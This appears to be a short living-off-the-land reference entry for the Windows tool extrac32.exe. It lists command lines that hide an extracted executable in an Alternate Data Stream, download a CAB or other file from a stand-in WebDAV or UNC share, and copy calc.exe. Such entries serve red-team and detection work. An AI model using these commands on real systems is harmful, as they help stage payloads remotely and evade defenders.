~/Privilege Escalation/Windows/Binaries# cat Extrac32.exe.md █
Paths:
C:\Windows\System32\extrac32.exe
C:\Windows\SysWOW64\extrac32.exe
Detection:
Alternate data streams
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Download
Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copy
Command for copying calc.exe to another folder
extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe